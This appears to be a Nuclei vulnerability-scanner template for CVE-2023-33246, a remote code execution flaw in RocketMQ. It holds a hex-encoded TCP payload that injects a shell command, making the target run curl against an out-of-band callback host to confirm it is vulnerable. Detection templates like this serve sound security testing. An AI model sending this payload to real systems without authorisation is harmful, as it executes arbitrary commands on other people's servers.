nuclei-templates/network/cves/2023/CVE-2023-33246.yaml

30 lines
1017 B
YAML
Raw Normal View History

id: CVE-2023-33246
info:
name: RocketMQ versions <= 5.1.0 Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
reference: https://github.com/I5N0rth/CVE-2023-33246
tags: cve,cve2023,rocketmq,rce
variables:
part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}'
part_b: '{{ hex_decode("3b0a") }}'
tcp:
- inputs:
- data: '{{ part_a + "{{interactsh-url}}" + "/////////////" + part_b }}'
read: 1024
host:
- "{{Hostname}}"
read-size: 4
# matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- "http"
- type: word
words:
- "serializeTypeCurrentRPC"